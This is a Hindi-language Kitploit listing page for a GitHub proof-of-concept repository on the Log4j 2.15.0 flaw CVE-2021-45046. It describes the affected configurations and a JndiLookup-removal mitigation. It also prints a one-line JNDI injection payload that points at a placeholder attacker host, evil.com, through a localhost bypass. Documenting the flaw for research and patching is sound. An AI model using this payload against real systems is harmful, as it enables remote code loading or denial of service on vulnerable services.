Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4j_CVE-2021-45046 — Log4j 2.15.0 विशेषाधिकार वृद्धि -- CVE-2021-45046 | Kitploit
उपकरण/GitHubGitHub/cckuailong/log4j_cve-2021-45046
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubcckuailong/log4j_cve-2021-45046

Log4j_CVE-2021-45046

Log4j 2.15.0 विशेषाधिकार वृद्धि -- CVE-2021-45046

रिपॉजिटरी देखें
22784 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4j 2.15.0 विशेषाधिकार वृद्धि -- CVE-2021-45046

हमला

विवरण

यह पाया गया कि Apache Log4j 2.15.0 में CVE-2021-44228 को संबोधित करने के लिए किया गया फिक्स कुछ गैर-डिफ़ॉल्ट कॉन्फ़िगरेशन में अधूरा था। यह उन हमलावरों को अनुमति दे सकता है जिनके पास Thread Context Map (MDC) इनपुट डेटा पर नियंत्रण है, जब लॉगिंग कॉन्फ़िगरेशन या तो Context Lookup (उदाहरण के लिए, $${ctx:loginId}) या Thread Context Map पैटर्न (%X, %mdc, या %MDC) के साथ एक गैर-डिफ़ॉल्ट Pattern Layout का उपयोग करता है, तो वे JNDI Lookup पैटर्न का उपयोग करके दुर्भावनापूर्ण इनपुट डेटा तैयार कर सकते हैं, जिसके परिणामस्वरूप सेवा से वंचित (DOS) हमला होता है। Log4j 2.15.0 डिफ़ॉल्ट रूप से JNDI LDAP lookups को localhost तक सीमित करता है। ध्यान दें कि पिछले शमन उपाय जिनमें सिस्टम प्रॉपर्टी log4j2.noFormatMsgLookup को true सेट करने जैसे कॉन्फ़िगरेशन शामिल हैं, इस विशिष्ट भेद्यता को कम नहीं करते हैं। Log4j 2.16.0 message lookup पैटर्न के लिए समर्थन हटाकर और डिफ़ॉल्ट रूप से JNDI कार्यक्षमता को अक्षम करके इस समस्या को ठीक करता है। इस समस्या को पिछले रिलीज़ (<2.16.0) में classpath से JndiLookup क्लास को हटाकर कम किया जा सकता है (उदाहरण: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)।

cvss 3.7 -> 9

Poc

root@kitploit:~
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}

Log4shell विषय

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

reapoc में योगदान करने के लिए स्वागत है

https://github.com/cckuailong/reapoc

टूल डाउनलोड करें